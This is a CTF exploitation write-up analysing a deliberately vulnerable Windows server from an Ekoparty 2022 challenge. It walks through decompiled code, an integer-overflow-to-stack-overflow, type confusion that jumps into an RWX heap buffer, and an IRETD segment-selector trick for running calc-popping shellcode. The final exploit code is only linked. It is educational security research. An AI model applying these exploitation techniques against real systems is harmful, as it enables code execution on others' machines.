Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since having a Windows exploitation challenge, is one of a kind in CTFs, and since I’ve found the challenge interesting and very clever, I’ve decided to post about my reverse engineering and exploitation methodology.

Table of Contents

Challenge Requests

Only Python solutions without external libraries will be accepted
The goal is to execute the Windows Calculator (calc.exe)
The solution should work on Windows 10 or Windows 11
Process continuation is desirable (not mandatory)

You can download the target application here (backup).

High-Level Analysis

When exploring an unknown executable, one of the first things I always check is the security features that were built into the binary when it was compiled. If on Linux I’m used to checksec.sh, on Windows I use winchecksec or PESecurity; they aren’t kept updated but they serve our purpose.

Doing so, resulted in the following mitigations:

C:\Users\VoidSec>winchecksec.exe bfs-eko2022.exe

Architecture : AMD64

Dynamic Base : "Present"

ASLR : "Present"

High Entropy VA : "NotPresent"

Force Integrity : "NotPresent"

Isolation : "Present"

NX/DEP : "Present"

SEH : N/A

CFG : "NotPresent"

RFG : "NotPresent"

SafeSEH : N/A

GS : "Present"

Authenticode : False

.NET : False

Some of these details can also be confirmed, at runtime, with a tool like System Informer (former Process Hacker):

This means that we are dealing with an x64, un-obfuscated, C++ (checked with DIE) compiled binary with ASLR, DEP and stack-canaries enabled mitigations but no CFG.

Once executed, the binary binds on 0.0.0.0, port 31415, and awaits client connection.

As per my methodology, I’ve proceeded with reverse engineering the high-level functionalities of each code block, renaming them with some meaningful labels. One thing that also helps me better visualize the code flow is colouring blocks:

Blue shades: nodes that I’m stepping through while debugging or paths followed by the software. For more complex software I’m generally tracing the execution flow with tools like PIN, Dynamorio and the Tenet IDA’s plugin.
Green shades: blocks that I want to reach or that are holding main/interesting functionalities I’d like to explore.
Black/grey: error messages/irrelevant code sections.
Orange: possible logic vulnerabilities that I’d like to further examine.
Red: possible memory corruption vulnerabilities that I’d like to further examine.

I’ve then collapsed all irrelevant nodes, leaving me with the following simplified code graph:

Handshake

I usually combine debugging and static code analysis in order to get the most out of both. I then proceeded to write a simple python “client” to interact with the target.

As soon as the software start, an always static (both in size and memory address) buffer is allocated in the heap:

As we can see from the VirtualAlloc() API call above, the buffer is allocated at address 0x10000000 and it is of size 0x1000 (4096 bytes); the memory protection for the region is RWX.

After that, we find the socket initialization, the server binding, and then it enters a loop, waiting for a client connection.[出自:jiwo.org]
Note: the server is not multithread and only one client per time is allowed.

Data sent to the server is stored in the previously allocated heap-buffer and then a function is called. This function, opportunely renamed as handhshake_check(), has the following prototype: handhshake_check(uint buffer_length, *buffer) and once decompiled it results in the following code:

_BOOL8 __fastcall handhshake_check(__int64 buffer_length, const char * buffer) {

return strncmp(buffer, Str2, 6 ui64) == 0;

}

This function verifies if the first 6 characters of our buffer match with the string “Hello“; if it does, the execution continues and the software sends back “Hi“.

Data Processing

After that, the execution flow is transferred to another function, which I’ve renamed as data_processing() and decompiled as follows:

int __fastcall data_processing(SOCKET socket)

{

int result; // eax

int v2; // eax

unsigned int i; // [rsp+20h] [rbp-F48h]

unsigned int header_len; // [rsp+24h] [rbp-F44h]

unsigned int len_0; // [rsp+24h] [rbp-F44h]

CHAR CmdLine[3840]; // [rsp+30h] [rbp-F38h] BYREF

char packet_type; // [rsp+F30h] [rbp-38h]

char stack_buff[8]; // [rsp+F40h] [rbp-28h] BYREF

char packet_type_0; // [rsp+F48h] [rbp-20h]

unsigned __int16 packet_data_length; // [rsp+F49h] [rbp-1Fh]

for ( i = 0; i < 0x1000; i += 16 )

{

*(_QWORD *)&heap_buff[i] = 0x5050505050505050i64;

*(_QWORD *)&heap_buff[i + 8] = 0xCF58585858585858ui64;

}

printf(" [+] Processing request\n");

header_len = recv(socket, stack_buff, 11, 0);

if ( header_len == -1 )

return printf(" [-] Client data error\n");

if ( header_len < 11ui64 )

return printf(" [-] Bad size\n");

if ( *(_QWORD *)stack_buff != '2202okE' )

return printf(" [-] Wrong cookie value\n");

packet_type = packet_type_0;

if ( packet_type_0 != 'T' )

return printf(" [-] Invalid packet type\n");

if ( (__int16)packet_data_length > 3840 ) // Integer Overflow

return printf(" [-] Invalid packet size\n");

len_0 = recv(socket, heap_buff, packet_data_length, 0);// writing packet_data to heap-buffer

printf(" [+] Data received: %i bytes\n", len_0);

char_replace(CmdLine, heap_buff, len_0);

if ( packet_type == 'T' )

{

printf(" [+] Message received: %s\n", CmdLine);

send(socket, CmdLine, len_0, 0);

}

else

{

printf(" [-] Unsupported message\n");

v2 = strlen(Str);

send(socket, buf, v2 + 1, 0);

}

result = packet_type;

if ( packet_type == 'X' )

{

off_7FF720E1C000 = (__int64 (__fastcall *)(_QWORD))&heap_buff[len_0];

return off_7FF720E1C000(CmdLine);

}

return result;

}

In this function:

Previously allocated heap-buffer is filled with 0x5050505050505050 and 0xCF58585858585858.
Note: this is weird as memory is usually initialized to 0.
Another packet is expected; this time the content is saved on a stack buffer.
If the received packet is at least 11 bytes then the function checks if the packet contains a specific “cookie value” 0x323230326F6B45 (“Eko2022“).
Then the first byte after the “cookie value” is checked for the presence of the T character. This field is used to determine the packet’s type.
Then the 2 bytes after the packet’s type are treated as the size of the packet’s data. The packet data’s size must be lower than 0xF00 (3840 bytes).

I’ve named this structure: packet_header

struct packet_header{

DWORD cookie_value;

BYTE packet_type;

SHORT packet_data_len;

}

After our packet’s header passes all the above validations, the server wait for the packet’s data. This packet (packet_data) will be saved in the previously allocated heap-buffer.

char_replace()

Then a function renamed as char_replace() is called; this function copies the content of packet_data (stored in the heap), to a stack buffer (CmdLine) of size 0xF00 (3840 bytes). While copying the data, it replaces all the occurrences of bytes 0x2B and 0x33 with null-bytes.

__int64 __fastcall char_replace(_BYTE *CmdLine, _BYTE *heap_buffer, unsigned int size)

{

__int64 result; // rax

unsigned int i; // [rsp+0h] [rbp-18h]

for ( i = 0; ; ++i )

{

result = size;

if ( i >= size )

break;

if ( *heap_buffer == 0x2B || *heap_buffer == 0x33 )

*CmdLine = 0;

else

*CmdLine = *heap_buffer;

++heap_buffer;

++CmdLine;

}

return result;

}

After the copy and character replacement, the resulting data is sent back to the client.

Chaining Vulnerabilities

Integer Overflow

The packet_data_len comparison (which IDA’s decompiler fails to visualize adequately) is odd enough to investigate. As we can see from the raw assembly:

movsx eax, packet_data_length

cmp eax, 0F00h

jle short loc_7FF609B81386

The packet_data_len value is loaded into the EAX register by the MOVSX opcode.

MOVSX: copies the contents of the source operand to the destination operand and sign extend the value. In 64-bit mode, the instruction’s default operation size is 32 bits.

JLE: It is a conditional jump that follows a test. It performs a signed comparison jump after a cmp if the destination operand is less than or equal to the source operand.

If we send a packet_data_len of value 0xFFFF, it will be sign-extended to 0xFFFFFFFF, treated as a negative value by the following comparison and “bypass” the length check.

Stack-based Buffer Overflow

The precedent “Integer Overflow” directly leads to a stack-based buffer overflow when the char_replace() function copies the content from the heap-buffer (at address 0x10000000) onto the CmdLine[3840] buffer using the length we have specified in the packet_header.packet_data_len field.

Before trashing the stack with the linear overflow we have, is always better to check what’s interesting on it. If with a debugger we check what’s left on the stack, after the CmdLine[3840] buffer, we will discover a couple of things:

Green: the content of the CmdLine buffer (filled with A’s up to its limit not to trigger the stack-based buffer overflow yet).
Blue: the content of the packet_type local variable.
Orange: the content of the packet_header buffer we’ve previously sent to the server.
Violet: the stack canary/cookie. Remember, the binary was compiled with the /GS flag and before data_processing()’s epilogue we can see a call to __security_check_cookie() function.
Red: the saved return pointer for the main() function.

Mitigations

Simply overwriting the saved return pointer is not a viable option as we’ll also end up overwriting the stack canary, causing the OS to kill the entire process.

Unfortunately, we do not have an information leak either as the send() function, responsible for echoing back the content of the CmdLine buffer, is not using the data_lenght value we control in the packet’s header but the actual size of packet_data we’ve sent.

We should definitely come up with something different.

Type Confusion

As mentioned before, one of the interesting pieces of data left on the stack, and sitting below our buffer, is the content of the packet_type local variable. This value is later used for the type-check comparisons:

if ( packet_type == 'T' )

{

printf(" [+] Message received: %s\n", CmdLine);

send(socket, CmdLine, len_0, 0);

}

else

{

[--TRUNCATED--]

}

result = packet_type;

if ( packet_type == 'X' )

{

[--TRUNCATED--]

}

return result;

As we can overwrite its value (using the linear stack-based buffer overflow previously discovered), we can cause a “type confusion” and end up in the X case.

Code Execution

If we successfully trigger the type confusion, the program will directly jump into the heap-buffer containing our packet_data and the data written during the heap-buffer “initialization” (0x5050505050505050 and 0xCF58585858585858).

These initialization bytes are not random, in fact, they are disassembled as:

pop rax

iretd

push rax

Without any further modification the software crash with an Access Violation error on the iretd instruction.
Note: the execution flow always jumps in the heap-buffer after the bytes we control. Cause of that, we cannot “bypass” nor overwrite the iretd instruction.

If we really want to crack this challenge we should dive into the iretd instruction.

iretd

Looking at the x86 Instruction Set Reference:

IRETD – interrupt return double (32-bit operand size):

Returns program control from an exception or interrupt handler to a program that was interrupted by an exception, an external interrupt, or a software-generated interrupt. In Real-Address Mode, the IRET instruction performs a far return to the interrupted program. During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

Since we control the stack, we’re only left with the task of crafting it in a way that would allow us to gain code execution.

IRETD expects the following values on the stack:

ESP

EFLAGS

EIP

We can easily point EIP and ESP to our heap-buffer we control, while I’ve taken the EFLAGS value from WinDbg.

EIP: 0x10000014 start of our heap-buffer plus an offset; used to directly land at the beginning of our shellcode.
ESP: 0x10000800 a “safe” place in the “middle” of our heap-buffer. Not at the beginning of our heap-buffer, as the shellcode will sit there, and not at the end to avoid stack’s consumption messing up outside the boundaries of the heap-buffer region, triggering access violation errors.
EFLAGS: 0x246
SS and CS on the other hand, were more difficult…

Global Descriptor Table

SS and CS are used to index the Global Descriptor Table (GDT) which has descriptors for:

0x00: Null descriptor
0x10: Kernel code segment
0x18: Kernel data segment
0x20: User code segment
0x28: User data segment

We can explore them in a kernel-mode debugger, such as WinDbg, with the following command:

0: kd> !process 0 0 bfs-eko2022.exe

PROCESS ffffe303936d7080

SessionId: 1 Cid: 0b38 Peb: 00dd2000 ParentCid: 0e90

DirBase: 119c67002 ObjectTable: ffffb48eed28d5c0 HandleCount: 52.

Image: bfs-eko2022.exe

0: kd> .process /r /P ffffe303936d7080

Implicit process is now ffffe303`936d7080

.cache forcedecodeptes done

Loading User Symbols

........

0: kd> dd @gdtr

fffff804`1645afb0 00000000 00000000 00000000 00000000

fffff804`1645afc0 00000000 00209b00 00000000 00409300

fffff804`1645afd0 0000ffff 00cffb00 0000ffff 00cff300

fffff804`1645afe0 00000000 0020fb00 00000000 00000000

fffff804`1645aff0 90000067 16008b45 fffff804 00000000

fffff804`1645b000 00003c00 0040f300 00000000 00000000

fffff804`1645b010 00000000 00000000 00000000 00000000

fffff804`1645b020 00000000 00000000 00000000 00000000

The first 24 bytes are “reserved” for kernel. For user mode, we want to use selectors 0x20 and 0x28.

However, it’s not quite that straightforward. Because the selectors are all 16 bytes in size, the two least significant bits of the selector will always be zero. Intel uses these two bits to represent the Requested Privilege Level (RPL). These are zero when operating in ring-0 (kernel), but as we want to move to ring-3 (user mode) we must set them to “3”.

This means that our code segment selector will be (0x20 | 0x3 = 0x23), and our data segment selector will be (0x28 | 0x3 = 0x2B).

Now, if for the code selector we don’t have any problem, the data selector on the other hand falls into to the “bad bytes” replaced by the char_replace() function.

For the code selector, we just need to find a value whose type is Data, RW. I’ve looped through all the selectors and ended up with the value 0x53:

0: kd> dg 0x53

P Si Gr Pr Lo

Sel Base Limit Type l ze an es ng Flags

---- ----------------- ----------------- ---------- - -- -- -- -- --------

0053 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P Nl 000004f3

CS: 0x23 code segment selector
SS: 0x53 stack segment selector

Using the above settings will pivot the code execution flow up to the beginning of our shellcode but in 32-bit mode. Unfortunately, since the stack base and limit are completely messed up, as soon as we try to use the stack (e.g., PUSH EAX) the program will crash.

To properly execute our shellcode, I’ve introduced the following “prologue” at the beginning of our shellcode:

JMP 0x33:0x1000001c

This “prologue” will jump some bytes further in our prologue and it also has the nice property of allowing us to specify 0x33 as the new code segment, bringing us back into 64-bit mode.
Note: if you’re wondering why I’m allowed to use the 0x33 value, note that, it is a “bad byte” only on the stack but we’re now in the heap where it can lie unaffected.

Since x64-bit doesn’t need a valid stack segment selector (it’s not used), we can finally restore the stack pointer to a meaningful value. Luckily enough, the RCX register still holds a reference to the original stack, before it was “polluted” by the IRETD instruction. We can just transfer it back into RSP with:

mov rsp,rcx

With everything restored we can execute the shellcode and finally pop calc!

Video PoC and Exploit

The complete (and commented) exploit code, IDA’s DB and target binary are available on my GitHub.

Challenge Requests

High-Level Analysis

Handshake

Data Processing

char_replace()

Chaining Vulnerabilities

Integer Overflow

Stack-based Buffer Overflow

Mitigations

Type Confusion

Code Execution

iretd

Global Descriptor Table

Video PoC and Exploit

Resources & References

评论

发表评论


顶	踩